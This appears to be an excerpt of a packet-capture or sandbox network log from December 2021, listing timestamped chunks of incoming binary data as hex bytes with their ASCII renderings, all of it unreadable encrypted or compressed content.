                                                                                              2021-12-13 23:57:15 UTC4385INData Raw: 02 5f 89 fb 1f cd 0c 3c 69 05 f1 d5 fd 54 24 5b e8 cf 63 e8 93 7e 26 01 d4 27 89 19 20 1d e6 6d 9f f9 95 7b f5 0e 66 d7 af de c1 17 c4 c2 36 20 f2 e6 90 02 16 41 e1 cd 88 eb 19 11 35 1a 37 85 3d d5 fb 5a a5 75 44 7b b5 b4 d5 66 5e 5d 0a c2 db f6 f8 2e b1 53 ea 14 11 d0 91 9c 54 29 e8 36 9d 33 58 04 64 31 17 d3 49 a9 31 55 24 ef bc d1 12 a6 b3 a4 ae 1c 95 48 39 e7 35 6b 7a ae e0 ed 3b 09 e1 7c ba a8 a0 7c b1 84 34 83 02 ca fd 1f b9 42 08 16 5a 87 68 37 bb 94 5c a6 df 02 ae fe c0 18 cd 9d 59 0b 2f 5c 0c d0 17 c1 e7 8c fa 9d 16 82 50 a1 9d 30 25 86 e6 84 80 47 4c aa 20 f0 25 95 a7 20 43 3a 2d 96 a6 28 df 81 53 22 e2 85 8a d2 83 a0 b9 0b 2b a1 0b e6 f9 37 c5 1a e0 e5 7e 71 58 9a 7d e0 33 07 76 6e 04 32 5e 04 69 7a 03 00 dc eb 22 27 d0 99 d3 62 38 e5 68 bc 0d
                                                                                              Data Ascii: _<iT$[c~&' m{f6 A57=ZuD{f^].ST)63Xd1I1U$H95kz;||4BZh7\Y/\P0%GL % C:-(S"+7~qX}3vn2^iz"'b8h
                                                                                              2021-12-13 23:57:15 UTC4401INData Raw: f1 d4 11 35 04 c9 21 62 3c 8e 61 1d 39 04 7b cf 38 a5 0c 0a 9f 64 70 d5 5d 1f 7e cf 2d e2 2f 15 d7 fb c8 33 ac ef 12 56 30 07 90 ca 63 36 58 9e fd da 19 a2 65 d7 6a 2a 0b 69 a6 7b ef 49 90 5f fe b3 9d ba 9e 08 07 18 36 aa b1 92 a4 16 65 0b 70 7b eb c2 f8 c1 b0 7a 8e 1c 2a c1 5d 5c d1 1d b4 f1 f0 47 19 8c b9 a9 17 10 d8 9b 64 d4 70 8e e7 00 e2 27 a5 a9 55 fe c8 ac bd 33 6d 67 38 f2 b7 3d 35 9d 46 33 5a 57 0b e3 74 8b 30 ad e8 ea 83 95 e2 ee d3 40 dc e6 a3 7a 04 5e 06 76 f6 94 b5 3e 8d 91 58 bb c7 cc a1 1f 6e 96 7d 0c bd 03 a7 f4 25 a4 a9 67 b3 5c d3 fd 49 0d a4 d8 e5 3c f8 04 3b 2f bc fd e8 2f 3e 6a 6e f5 24 00 41 5b 83 22 c2 fe 68 ee 7a 9f b0 a4 48 dc a1 9e 2d d0 64 b2 a0 50 b2 f3 cf e4 b4 b5 a3 06 b4 20 c9 3f 3e cf 91 12 ed 3e a3 74 a9 8e cd 98 bb ba 0d
                                                                                              Data Ascii: 5!b<a9{8dp]~-/3V0c6Xej*i{I_6ep{z*]\Gdp'U3mg8=5F3ZWt0@z^v>Xn}%g\I<;//>jn$A["hzH-dP ?>>t
                                                                                              2021-12-13 23:57:15 UTC4402INData Raw: 19 b7 d7 e8 02 32 bf d1 04 1f 9a ad 94 d6 d6 05 e3 b4 25 d3 82 6e d8 f6 d7 c4 3b 51 de 26 64 2c ab bb 40 1e 15 de 35 89 04 2d 4f a1 1d dc 31 2e 89 ee 42 6f dc c4 ea a4 70 f2 0e 3a ee 8f 30 ac ee 57 35 4f aa 2f 12 88 08 ad dc dd 69 ba 95 1a 9f d7 2b 0f 0f c6 05 15 96 aa e1 58 dc 90 1b b3 40 67 08 30 d5 93 9e ea 5c 62 08 bb a0 55 48 d3 c8 2b 3c ad 42 0e 9d 8f f9 3a 50 e5 7d 9c c2 8a 63 10 61 94 5b 08 d0 a9 36 cf e3 2b b6 48 69 90 88 cc 72 61 d0 a8 fc fa ea 0d 4f 5f 08 2c 64 81 a4 ff 31 d8 8e 4c f9 9b d4 1a 22 45 6c fb 4d 0f 4f 06 b5 ab 31 77 a0 ca d4 a0 31 dd 9e f8 49 31 b9 21 88 f7 d9 5e 70 00 6c de ca 22 5e 48 00 3e 7a 5e 39 fc f1 8b 69 cf c1 e5 5d ce f7 92 0b 10 36 3d 62 94 fa 5a 0d 28 ef b6 6f 54 4a b0 a3 4a 7f f1 82 9c 7a c9 81 cb 40 94 65 14 c6 51 1e
                                                                                              Data Ascii: 2%n;Q&d,@5-O1.Bop:0W5O/i+X@g0\bUH+<B:P}ca[6+HiraO_,d1L"ElMO1w1I1!^pl"^H>z^9i]6=bZ(oTJJz@eQ
                                                                                              2021-12-13 23:57:15 UTC4418INData Raw: 5b a9 5c 4e c4 ea b8 4f 0b 16 92 2b df 48 1a 1d a4 76 25 3c 01 8d b8 65 cb b4 27 f2 cf d1 b8 3e af 0d aa 17 ee a9 26 34 89 94 e7 f1 70 1f 4a 62 01 34 84 f6 1e 3a da d9 9a e6 59 17 41 d0 a5 00 88 d1 0e c4 3f f4 25 60 ae c3 31 2b 9c 2b ee 19 d7 fa 64 09 1e e4 91 54 a4 e2 90 bf 50 af c8 b5 87 27 72 1b f2 a6 e4 e3 d6 5b 62 0f b4 bd 0f b0 71 54 9f 12 85 4d 29 47 8c e8 28 a0 33 a7 13 40 e8 c4 79 47 c0 55 83 7d 1b b7 f5 36 cc 18 e4 89 b9 6b 4a d1 e8 db 8e af 63 54 6d 4a e5 aa 7b 79 69 bd 51 f3 b0 f2 48 ee b4 53 7a e0 16 42 f3 be d6 27 2c f9 e8 f8 5e c2 54 e9 15 98 75 d2 56 13 09 47 60 be e2 5b 67 82 8f ff 3e 3c a7 4c b0 53 d1 28 12 b4 47 3f 04 cb 5b ee ba 6f 85 98 5e 37 31 92 d5 86 d0 c9 37 7a 92 47 4c 8c fb 3d 5b 44 38 a7 59 ab db 4f 03 58 17 99 b9 e5 bb 83 01
                                                                                              Data Ascii: [\NO+Hv%<e'>&4pJb4:YA?%`1++dTP'r[bqTM)G(3@yGU}6kJcTmJ{yiQHSzB',^TuVG`[g><LS(G?[o^717zGL=[D8YOX
                                                                                              2021-12-13 23:57:15 UTC4419INData Raw: 84 4b 0b 0a ac 75 e7 6d 7e 97 e6 27 64 c4 e6 e9 9a 5c d7 21 17 10 58 48 ca c4 97 d2 5a e6 cb 11 35 ba be 01 89 df 0d c9 11 7a 85 8b 91 ed 18 70 86 8f 72 eb a4 c4 4f 50 00 a0 cb c6 9b 13 57 81 09 be dd 9f b6 18 a3 70 88 05 6f d7 15 80 49 f5 e5 da 29 7b f6 26 39 d8 90 3a 0e 50 79 bd a4 65 95 e9 e2 b7 4e ff 09 73 2d ac 66 90 d0 99 9a 0b 2d 5e 7a 1b b0 9b 0e 6c 77 3b 71 a1 ed b5 24 2e 1c 24 e5 3e c7 22 b0 90 79 2d b7 6a 80 5f b3 25 bd fb e5 88 07 13 c6 c4 dd 10 e7 3e 13 b7 44 93 6c 70 6c be 62 f0 d6 2a 6d 01 9e 9f 4a 7c 78 40 ee 0b b0 5f d7 da 1e cf 20 02 a2 dd c7 fd a0 fe 63 03 a5 e8 8b 6d 02 10 fb 77 11 6c 7d 79 0e 75 2b 4f fd b6 9a 42 72 f2 3b 6b 63 5c 0c ba 0c 1a 54 1f 2d 20 94 76 c9 b3 f8 dd 5b 47 c3 21 87 28 31 0b 41 80 88 69 78 b9 20 5f a0 85 30 62 06
                                                                                              Data Ascii: Kum~'d\!XHZ5zprOPWpoI){&9:PyeNs-f-^zlw;q$.$>"y-j_%>Dlplb*mJ|x@_ cmwl}yu+OBr;kc\T- v[G!(1Aix _0b
                                                                                              2021-12-13 23:57:15 UTC4435INData Raw: 4d b2 c5 82 f0 08 7a ed 20 98 a6 48 98 b2 11 59 70 96 10 d6 d6 69 e6 b2 98 a4 ac 14 9c fe fd 9a 91 c0 12 83 03 37 9e bf 04 8d fe 14 06 8a 8b 9f 03 4d b0 71 0d 7a f8 da e9 fc 16 f3 5f 11 f2 49 91 d2 8d a0 87 8f 6f c4 18 50 75 e9 43 75 24 40 f4 d5 a2 2a d5 6c 0e 3e c3 34 50 32 14 e1 62 8a a9 55 19 a2 50 b4 06 d8 0f f1 7d af f4 b9 20 fd d6 fc c2 e9 4d d2 20 f7 40 03 6e 45 62 ef 8b 22 be ed ad 3b 50 72 8f dd 7d da 40 3b ef c6 cd af 6f 29 83 8b fe bb 78 4e b4 2b 5d 9e ff 0c fe 6d 25 2e 38 94 14 f9 fc 59 e5 04 3e 28 1e b3 cd b0 ac 26 99 50 0e 0c db 64 cd 98 74 21 7a 3a fd 70 6e 91 80 36 9c 7c 9d de 1d 02 b0 52 f8 a6 b9 11 47 02 f0 37 75 95 54 44 e0 73 da 3a b9 e1 8b 40 b1 f3 d8 50 37 33 e2 04 a3 ad 69 32 8b a8 b1 d1 8d df 24 46 a6 7b e3 57 ea 4f 94 19 59 6f ab
                                                                                              Data Ascii: Mz HYpi7Mqz_IoPuCu$@*l>4P2bUP} M @nEb";Pr}@;o)xN+]m%.8Y>(&Pdt!z:pn6|RG7uTDs:@P73i2$F{WOYo
                                                                                              2021-12-13 23:57:15 UTC4436INData Raw: 3d 17 8f 2e aa fd da dc 10 3c 4d fb b4 fb f6 fa d0 52 ea 4e 20 49 c4 a2 0f 18 7a 3f 73 41 31 4b 48 c9 b2 43 2d 42 c0 43 c1 f3 66 f9 41 22 3c b1 aa 83 fe 92 6e c2 05 a5 c0 46 a1 2a 52 cc 6d 44 51 59 fa 95 a7 af 0d da 35 cf d3 ac 73 f0 1d bb 3c 61 af 9d 7d 76 d1 0c 30 ca 98 cd eb 3a f6 10 eb 3d f0 8b 0d db f0 0e 3e b8 03 ba e9 63 66 50 42 51 a3 db 9d 23 db 12 84 cb 0d 33 ca f3 d2 99 2f db f9 83 72 99 95 86 48 d2 f3 0c ae 77 1f 21 dd c5 c5 d5 0d f9 61 7f 8f 69 f2 7d ce 1a 8e aa e9 20 bb d3 65 1c 7b ca 9b 30 b4 78 6b d3 4d c0 3d 7e 9a 76 20 1c 0b 6d d4 e7 b6 24 a9 24 9c 0b 8e 55 a7 48 b7 16 b7 64 57 53 5a 66 19 27 d2 1a 4f d8 f0 70 62 9d 58 6d e4 9f ea c2 69 ab 82 83 51 60 7d 73 f9 de 07 09 10 1f e7 23 43 3b b3 83 ae ef fa da c2 e8 0f a4 04 fd ee e6 c8 fc 86
                                                                                              Data Ascii: =.<MRN Iz?sA1KHC-BCfA"<nF*RmDQY5s<a}v0:=>cfPBQ#3/rHw!ai} e{0xkM=~v m$$UHdWSZf'OpbXmiQ`}s#C;
                                                                                              2021-12-13 23:57:15 UTC4452INData Raw: 5d 17 e0 19 33 3f 52 f7 8e 1c 56 95 32 b4 aa 5e 3b 00 42 b0 ca 96 df 06 74 87 83 08 3a ae 7e a7 9e 5f 7e 43 a4 5e 5d 8b b3 6a 76 64 85 1a b7 99 ce 5b 56 c9 f1 c2 70 6c c7 21 99 9c 5b 0f 89 8a 80 4e bc fb 98 c8 84 18 68 1b df 40 8f 57 dc c3 ff 47 bd af df 3e e0 5b 41 0c 34 8e 23 26 01 57 7a b7 eb 2b c4 4a 12 6c cd 3e 41 d7 4a ed 42 6a 7b 3d ec fa 68 e0 bf f9 8c 72 df 3a 12 fc 32 bb 02 e0 84 de 7f 82 7c ae ed cc 70 9c b3 51 8d ca ec 3d ac 7a eb 74 45 26 bd 35 5e a5 80 b7 a0 3d e5 f4 ee 65 85 20 f8 d8 55 ce ce b4 8c b3 7f 98 c1 d6 93 2b 69 61 0e a3 99 83 62 6c 0b dc ea 6c b4 b1 f3 74 f8 b9 24 e7 ad db 73 31 ac 77 82 5e 3e b0 46 7b ca 46 38 16 5d 19 79 e7 26 c0 4c bb 1d f7 cd 5b 33 20 8e 9c d6 dd cf e9 44 a7 81 c5 e9 28 d6 ac 2c de 5e a6 75 0b 95 16 f3 04 99
                                                                                              Data Ascii: ]3?RV2^;Bt:~_~C^]jvd[Vpl![Nh@WG>[A4#&Wz+Jl>AJBj{=hr:2|pQ=ztE&5^=e U+iabllt$s1w^>F{F8]y&L[3 D(,^u
                                                                                              2021-12-13 23:57:15 UTC4453INData Raw: f8 5d b7 20 01 db c4 33 15 52 43 30 45 1e 0b d5 8d 44 e6 36 71 20 c4 40 04 6a aa cf 4e ed 8c 74 c2 53 f7 cc b2 34 ec 94 57 e0 e6 3f 71 e4 87 0c fc 4a 29 ec 67 3c 53 07 a0 94 e3 2e 5d f2 2b b2 0e 7e 03 e7 51 fe df d8 39 2b d2 27 1c 43 41 8e f9 93 6b 08 41 e8 ae 47 81 91 2d 3e 03 07 4d e5 b2 2e 60 a3 6c 98 a5 9f 5e aa 7b 49 76 1a e1 cb 6f 24 40 d7 a9 52 57 61 09 1b 93 a8 ac a0 e6 12 3d c6 80 88 82 e5 e2 1c a2 ee 9a ec 52 a3 ed b6 68 d5 3a 3e 36 77 7e 42 be 88 bb 7e 95 6d 8a 31 82 96 15 eb 6d 1c 5c a7 e2 6c 73 c5 04 51 d8 37 c4 e9 bb 1a c8 05 91 16 6c 1b 35 b0 5d 02 73 c0 78 50 2f d8 ca 0b 62 7b 55 4f 0f 87 40 84 93 b4 07 1d cb a3 14 9f 74 12 98 ff 33 65 b6 6a 1a 39 7e 58 fd 67 4a cf 49 6c 45 9d c3 90 6b 06 86 20 ae 16 b9 2c c9 d8 45 a1 b9 75 d2 ab 78 42 51
                                                                                              Data Ascii: ] 3RC0ED6q @jNtS4W?qJ)g<S.]+~Q9+'CAkAG->M.`l^{Ivo$@RWa=Rh:>6w~B~m1m\lsQ7l5]sxP/b{UO@t3ej9~XgJIlEk ,EuxBQ
                                                                                              2021-12-13 23:57:15 UTC4469INData Raw: 6b 11 90 e7 05 f6 13 92 1b 0a 7f 47 a4 ec 55 54 44 82 b5 b7 63 30 c2 95 8c 8c 8b d7 64 c6 d4 9d e2 e1 a9 62 5a 1c b5 41 2c 17 03 10 03 ea af 99 6f ee 61 da 09 cc 01 ef 6d f0 10 62 9d db 78 18 d6 86 29 45 13 2d ff c8 80 0c 18 f9 4c f3 32 b1 31 5e 99 a5 6a b1 f0 b2 61 c5 20 2d ca c6 53 ad 3e c0 2f 1f dc 8d ca 58 15 c8 a2 53 9c 5b f0 ab fa ac 56 64 c2 54 cc d9 e2 a0 58 dd 78 3e 00 c9 7c 59 78 e2 d7 9a ae 68 22 12 37 22 30 b8 90 16 d9 43 b7 5e cf dd 69 cf df 69 fc 01 d2 11 f9 e0 76 a0 94 94 9b c1 96 5b d8 0d 91 eb ae 0a 11 4a cf 58 7e c0 65 32 09 34 35 7f 81 c3 2d f0 17 ea f1 a3 3d 2e cc 39 c0 58 b0 20 b8 90 23 eb 75 df 1d b8 93 b8 97 89 ab c3 6e fe 73 26 48 1d e2 e6 3f 2f f5 89 35 8d ab bb 46 e7 88 ea 7d 63 ad a4 17 a6 b7 dd b5 e9 be 18 8f 4b 8f 9c e4 27 8d
                                                                                              Data Ascii: kGUTDc0dbZA,oambx)E-L21^ja -S>/XS[VdTXx>|Yxh"7"0C^iiv[JX~e245-=.9X #uns&H?/5F}cK'
                                                                                              2021-12-13 23:57:15 UTC4470INData Raw: f9 d1 de 29 2e 9d 83 29 fe 0b 86 2e 76 48 f8 1a 67 d2 40 05 00 51 3c 4d 9f da 0d 16 45 e7 49 89 5e c4 cd 0e 02 e6 74 bd 24 7d d8 62 1f 00 2e 5e 61 d7 6f 73 80 a1 75 16 11 43 43 c8 f5 9f 58 f3 29 ea bd 53 ef 1c 56 ac 2e 2f fa e7 19 c1 56 1d 6b 38 9d cd 01 ca 47 b0 52 f0 d0 08 df 5b 8c 38 31 c9 bb 58 5f 6f bb d9 a1 c2 26 12 1c bf 83 a0 29 be 1d 2a 85 d8 7e 3b fc 48 2b f8 75 0d 25 b9 94 18 80 8c 89 a3 60 00 3b 82 bb 09 53 17 45 48 9d a6 c2 97 32 01 d6 e4 cb ee c8 5e 89 55 b4 26 be ae 1c fa 41 cd 00 d8 6e 43 aa 15 78 b1 4a 36 8d f1 7c b9 88 8c 82 eb c8 bd e9 d9 38 f6 9b 57 70 0e ea 33 da 26 63 b6 06 9c 0d d8 c6 07 dd c3 f2 4f 93 e1 e8 4f dc ac 1a 63 81 56 30 5a 88 4d 10 4c 9c 38 03 2b 76 60 4a 6a c7 5c 87 d2 57 3d 3e 74 50 e1 9f dd 47 5e 15 9d 7a f6 b8 c6 0c
                                                                                              Data Ascii: ).).vHg@Q<MEI^t$}b.^aosuCCX)SV./Vk8GR[81X_o&)*~;H+u%`;SEH2^U&AnCxJ6|8Wp3&cOOcV0ZML8+v`Jj\W=>tPG^z
                                                                                              2021-12-13 23:57:15 UTC4486INData Raw: e4 25 e6 fb 07 ae 50 60 ba a2 1d f9 b6 3c 75 6d c1 f4 38 c8 49 87 50 ad 29 03 81 0d cf cd fc ca f8 dc b1 25 b6 f3 18 42 72 3f e7 6d db a0 62 3b 6c 78 a8 a1 4f 74 bd 8d 3c 4d 7c d0 df 64 e1 16 08 99 f0 3c c8 c9 90 17 f1 06 8c 58 06 ec 00 cd ba d3 87 0f 48 2b 56 8e f3 3d 80 13 e2 35 a5 9b bb 26 fc 76 f9 37 b8 51 cd d2 cd 21 cf 3a 1a ba 01 58 8a b4 bf 82 84 83 58 bd 5d 32 8b f8 6e b9 59 d7 ca 61 11 4f f0 15 98 bf ac 28 1c 71 45 f3 23 70 d8 9d e6 be 8a 1c 3c 64 d9 41 a1 bd 3c bd a3 67 05 94 14 05 e2 f1 a8 e8 78 9b b2 8c ac 13 c2 dd d6 4b 74 e6 18 4e 10 f3 2f c5 ac be f6 be 0e 78 af c4 c4 0b fa 57 bd 00 37 c7 7a dd ba e7 34 ad f5 64 a1 68 ce 5b 5e 10 af 3c 5e 97 90 7b 58 96 34 9e f7 bf 4f b0 f4 4b f2 8c e6 6d 20 f8 3f 30 f1 e7 1d 22 29 db fe 46 1d 8b 52 f8 15
                                                                                              Data Ascii: %P`<um8IP)%Br?mb;lxOt<M|d<XH+V=5&v7Q!:XX]2nYaO(qE#p<dA<gxKtN/xW7z4dh[^<^{X4OKm ?0")FR
                                                                                              2021-12-13 23:57:15 UTC4487INData Raw: 31 1a 0d d6 b9 ef fd df d5 d9 db da 27 83 a1 18 0a 86 9b 8d b0 4c a3 f2 e7 0c 73 a9 a8 9e 95 be 03 40 f2 f9 f4 0b 94 32 b9 b8 c9 9d 03 d8 1b 65 20 4d fc 4e b2 31 73 25 d7 6d a5 ed 6a d0 1a 06 8c 71 87 b3 db b2 d1 a4 f5 09 6c eb b7 78 b4 94 b3 d9 52 c2 57 77 1a 51 44 87 56 73 fa 6e 5c 61 3c 78 8e f8 da 48 e0 c5 d0 ad 8d ca df 70 8f 0c 12 c4 a1 a3 c4 d8 95 4c 0c 42 67 83 e9 65 b6 78 94 79 fa 85 ae 64 c8 f8 bf 7c 49 77 90 5b df f1 ad 9a 2a c7 9f c2 8e d7 e2 da d8 7f 2d b3 62 b5 b5 8c 22 dc 0c b1 dc af 28 fc 83 97 4c 0d 30 b9 13 76 69 9a bc 6d d4 0a d9 77 7e 2f d2 86 b1 ae 46 62 78 91 b4 8d f4 0d e2 2c f3 56 2d df a3 d1 b9 7e 8b a8 2c f3 28 bc f3 c8 10 cd cc f1 54 c8 9e 97 14 ec 44 71 29 63 f5 ed 6b 6a ca 44 a3 cc 8f 5e 5c cc 9f 38 72 e5 8d 03 cd dd b2 8b 40
                                                                                              Data Ascii: 1'Ls@2e MN1s%mjqlxRWwQDVsn\a<xHpLBgexyd|Iw[*-b"(L0vimw~/Fbx,V-~,(TDq)ckjD^\8r@
                                                                                              2021-12-13 23:57:15 UTC4503INData Raw: 9e 55 82 68 ec 23 2d a2 b3 11 9f 9f 06 4c 97 85 10 c2 ca e8 e0 13 f9 1f 48 2b fa bb dd 36 13 64 5f df b9 88 0b e8 19 6a 99 4e 57 e7 8b b7 59 9d 90 15 f8 f5 6f f7 b5 0e 29 7a 82 93 f8 8d 15 29 9e a2 00 b4 45 18 50 21 51 08 d8 60 9b 49 36 3a 2d d6 6b 6b 77 59 d5 03 dd 71 2b d7 57 d2 88 2f 73 31 36 74 19 72 cb f1 68 6e 60 e5 78 4a b1 93 5d af a7 24 82 41 57 62 5a 34 ef 61 f1 e6 f9 a3 ef d8 76 91 fd 7a 91 5b 63 e3 56 94 ae 3c 75 89 38 a7 b9 a6 08 5e 3e b0 cb 64 66 01 06 3d a4 b6 69 85 37 f6 5c 2f 5c e3 61 b4 d7 75 e3 05 5b f5 90 47 c2 b1 d7 8d 58 ae e3 54 3a 8b d1 7c 00 fe 90 16 1f d5 99 be e6 86 18 65 d7 3f 5c 1a 4e a9 a7 38 83 da e7 d9 9b a6 4b bd a0 02 7d 83 6b 3f e3 d0 b3 b7 a0 17 ca 57 61 98 c1 70 0b c4 21 20 ac 23 9e 63 2e 7a 34 6c 53 89 1c 71 7a 29 ef
                                                                                              Data Ascii: Uh#-LH+6d_jNWYo)z)EP!Q`I6:-kkwYq+W/s16trhn`xJ]$AWbZ4avz[cV<u8^>df=i7\/\au[GXT:|e?\N8K}k?Wap! #c.z4lSqz)
                                                                                              2021-12-13 23:57:15 UTC4504INData Raw: f3 37 b0 c6 41 7c 5f 14 3b 10 a9 ac 8b 19 52 f7 8a 51 6d 3c 35 d9 ae 6a 07 eb 9e 08 ad 79 6d dd d8 42 f5 e7 fe c5 e6 f9 31 6a dc 1a a8 f6 cd 06 f7 24 fc 7a a2 12 5e 33 7b 79 35 ce 9e 0b fb 97 89 2a 38 e4 75 5d 3e ee e1 e0 92 33 93 7b f2 d4 4e a1 16 c2 da 9f 60 78 93 ca 35 a3 25 81 1e b3 a9 fe 11 fb 63 be 3b c1 e1 e3 91 82 a2 76 17 14 e9 32 63 63 4d 98 ce a1 cf d2 f8 cd 3e b9 9a a7 90 7b bb 63 4a 65 84 8a 63 35 fb 7f c4 21 74 c7 17 9a 1a 0f 44 c2 cd 0b b0 d9 5a 7e 6a 36 08 61 e0 49 51 05 ab f5 21 22 f9 d7 5d d5 02 b3 1a f9 bc 7b c8 26 3b 54 35 e4 e5 4b 59 54 33 2a cf 2c 65 ad 37 88 3b cb d4 ea c3 28 64 a0 45 f0 f3 ce 8d ab 3c 65 ed 2f de 25 6f 6a d3 40 70 a3 84 2e 22 05 51 26 22 13 fc e1 4e 51 de 84 18 c4 3f 5f 86 da 89 a5 af 04 04 35 a8 43 75 28 84 37 7c
                                                                                              Data Ascii: 7A|_;RQm<5jymB1j$z^3{y5*8u]>3{N`x5%c;v2ccM>{cJec5!tDZ~j6aIQ!"]{&;T5KYT3*,e7;(dE<e/%oj@p."Q&"NQ?_5Cu(7|
                                                                                              2021-12-13 23:57:15 UTC4520INData Raw: a5 1e 6f f9 6c 45 48 8a ec 04 86 98 a7 43 b2 a0 19 5a e8 d6 0f 28 71 a8 d5 78 3b 6d 5f 37 40 f8 5e 83 7b da ca e9 bb 10 7b 5d f0 1f de e4 e3 1e ec 31 b4 99 a0 07 95 60 4c e5 a3 c4 e8 c7 e2 d0 09 ac 5c b2 56 e9 36 c0 cd 18 30 41 56 a2 58 a4 f5 10 1e 54 e1 9a 3b 9b 5a 83 34 e5 06 34 88 40 f4 a3 8d e5 77 a4 13 1d 36 3c bb 02 68 5d 69 bd 5b 12 4b 9c 78 33 68 ac ac 30 cd 58 fc c8 ab 5d e4 1b 4c 5e c0 ac ff 7d 51 f4 db f1 fd 5d f4 b6 6f df 3f 65 fb ba 65 4c 14 a2 c4 18 ea 94 b8 25 ed 51 9c 3b ec 37 b8 cf f7 d7 75 2e a0 08 94 86 e6 13 5d 37 63 ca ef 47 b3 53 87 ed 42 6b 87 27 83 c5 74 e0 b6 14 df e1 6b 37 0f b3 e4 9d 5d 74 69 bc cd 7c ad 2c e9 3d 57 c6 32 2f 2b bd d7 45 65 73 a4 02 62 a7 13 f0 5c 7f d0 93 db 05 dd 15 5f 1a 02 06 80 2a 27 4b 77 e1 9d dd ef 53 b3
                                                                                              Data Ascii: olEHCZ(qx;m_7@^{{]1`L\V60AVXT;Z44@w6<h]i[Kx3h0X]L^}Q]o?eeL%Q;7u.]7cGSBk'tk7]ti|,=W2/+Eesb\_*'KwS
                                                                                              2021-12-13 23:57:15 UTC4521INData Raw: bd b6 59 ab 67 36 37 4f 21 f0 c1 6b 36 97 07 80 78 81 8c 70 2c f9 ef b1 8e 5c 72 85 a2 31 2f 4c a7 6d 8b 1b cb d2 a4 f2 f0 7d 5c 8e cd 2c b6 75 5f a2 6c 8e 82 e8 bb 6e f2 68 a4 88 6d aa f8 80 f4 cc 47 0c b9 29 e8 3b 3d 60 c3 3f 25 af bd 72 f5 e5 b2 f2 2c 97 30 fb bc 96 bd 5b 3b 12 9a 0d 4a 14 dd 3b 36 cc 6e c0 86 ee 63 77 12 1d 9b 41 58 1d d1 35 a6 54 09 6f 24 6e 82 6e 06 9c ac 18 66 c7 7e 61 ea 28 c1 65 9c b6 67 fd 39 5f 1d 1a ca 2e 68 b9 7f 5c a9 a1 21 ca e7 7e 1f 8b e9 ce b5 93 86 c1 66 65 7c 88 22 5d 7e 10 74 dc 98 4e 91 3a 36 6a c4 29 ea 1e 2a 04 e7 05 dd ce a0 dc 19 97 2d 07 7d b2 2a 60 db 54 c3 91 dc 61 5f 7f 7a d7 43 b7 85 03 ca b6 34 04 29 03 d9 cb 72 48 dc c8 39 94 c8 0b 26 8f c1 49 59 3c 3b f4 8d a7 ea 6b 98 c6 57 4d f3 10 ee 26 c2 d6 7f 6f e1
                                                                                              Data Ascii: Yg67O!k6xp,\r1/Lm}\,u_lnhmG);=`?%r,0[;J;6ncwAX5To$nnf~a(eg9_.h\!~fe|"]~tN:6j)*-}*`Ta_zC4)rH9&IY<;kWM&o
                                                                                              2021-12-13 23:57:15 UTC4537INData Raw: da 92 d3 f3 ca 77 12 7c d0 b8 c3 b0 d3 a6 3b d3 cf 25 ba ac 27 37 a2 8c f7 86 d8 3b 90 34 93 19 5a ef 10 c6 27 71 2d 67 78 01 c1 1e 9b 1f 1d a0 56 87 94 c0 d5 25 70 b9 ff 6a ec 80 73 2b 46 0a a9 91 2d 49 6d 68 12 52 f0 e2 89 33 9b 01 05 49 3a 6e 61 ed 2a 18 a3 68 06 92 99 d5 b0 12 5e 9e b4 f5 c7 ce eb b9 10 a7 8d e7 69 1e bd 0e e3 3c a1 60 ba fe ad fd f9 39 18 2e c0 df 0d 63 50 d4 78 67 90 24 3f 37 b9 f3 f5 fa 1e df 05 ec e9 37 2c 82 f5 97 12 91 d7 b5 39 de f7 0d 91 94 de 8b de c0 10 21 d6 f8 2d eb f9 b6 a8 88 40 57 05 fb be 64 c3 3b b8 ec a3 a0 56 17 3a 15 b8 49 d8 f5 c5 1b 62 6d 8f 4d e6 2a 06 de 74 e1 da fc 73 a4 f8 7e 74 2c 6d 59 c8 6c 9b 63 ac e3 f2 5b f2 8d cb f4 d1 47 63 0c 22 f5 92 51 de 64 bb 2c 7f b7 d7 cf ce c8 9f e0 07 bb 9d a7 a1 82 f8 c5 09
                                                                                              Data Ascii: w|;%'7;4Z'q-gxV%pjs+F-ImhR3I:na*h^i<`9.cPxg$?77,9!-@Wd;V:IbmM*ts~t,mYlc[Gc"Qd,
                                                                                              2021-12-13 23:57:15 UTC4538INData Raw: 03 2a f5 6b 60 39 97 57 04 99 e6 22 75 c5 6b 7e 94 b2 4d 74 fd 56 95 bc 10 dd c8 08 4e 0c f1 f9 de ec f7 4a 99 9e d7 6d 77 17 68 12 0c 54 f0 68 52 16 3c 2c 7d 0d 0f 24 47 30 82 15 35 4f bc 80 fc 2f 04 bc e7 e7 28 60 54 3e 34 58 a0 01 90 cb 1d 0f 3d 5e b6 d8 50 0b d2 2d dc ac ea 21 aa b7 1e 1e c9 ea 2f 3f 2e 74 3d 85 49 29 57 ed a9 bc b2 1a 9f 7d fb ad f0 70 fd 83 76 9d 9b c7 7c 48 41 a4 c1 e3 8f 48 7b 98 49 04 ef c9 65 90 af 17 30 79 59 66 26 1d be a5 ee 95 bf eb 2c 6b d2 29 69 26 e9 16 38 5c 7c 5d 04 d0 9a 63 f5 34 a0 fc 53 0d f9 0e 12 64 56 8c 94 ae da 20 92 22 81 df 71 17 20 a4 4e e7 d0 fd 8b a5 f9 20 d2 25 55 2c cf 9a be e4 16 4a 08 5c 12 12 d7 ec 3e 61 60 1b 9a 61 da f9 fb 87 85 21 38 17 1c b5 f1 1a 98 02 42 58 b7 65 bd 79 21 55 dd 23 3c 4c f3 3a c9
                                                                                              Data Ascii: *k`9W"uk~MtVNJmwhThR<,}$G05O/(`T>4X=^P-!/?.t=I)W}pv|HAH{Ie0yYf&,k)i&8\|]c4SdV "q N %U,J\>a`a!8BXey!U#<L:
                                                                                              2021-12-13 23:57:15 UTC4554INData Raw: d1 6a 34 8f c9 3d e5 a4 a0 cb 1a 11 e0 e9 d8 f0 82 79 33 ce 46 17 fb 1a d3 58 bc 6b ea ca a8 96 99 ae 52 7b dc 19 3f 1e 3d 3d d3 d6 77 42 c7 ec 90 08 d5 f3 43 f4 59 14 a9 76 8c 50 3f 7a ba 54 14 29 83 52 c8 05 21 2c a2 15 2f 3d 8f 59 bf aa fd 60 b6 bb 24 5e 43 28 a2 f1 b3 a0 a3 b3 a1 ea 28 e4 a5 9e ba 4b d3 bc 6a 0e ea 23 e4 28 a5 b1 03 c0 c4 9d f8 e0 8b 5a 75 53 4a fb ce f2 6b 5d 65 c9 01 18 99 43 50 09 5e 52 7d 9a 4b 99 fb 43 93 f9 44 b4 4b 44 9d 03 09 47 ff 6a c6 b9 04 a3 fe 0a 27 32 92 3d 52 d5 ca 2a 60 24 b0 15 08 4d e7 11 ae f1 44 34 ea 54 57 c9 9e ad 45 be b2 5b 4b 75 07 ff b8 e5 ea f5 5f 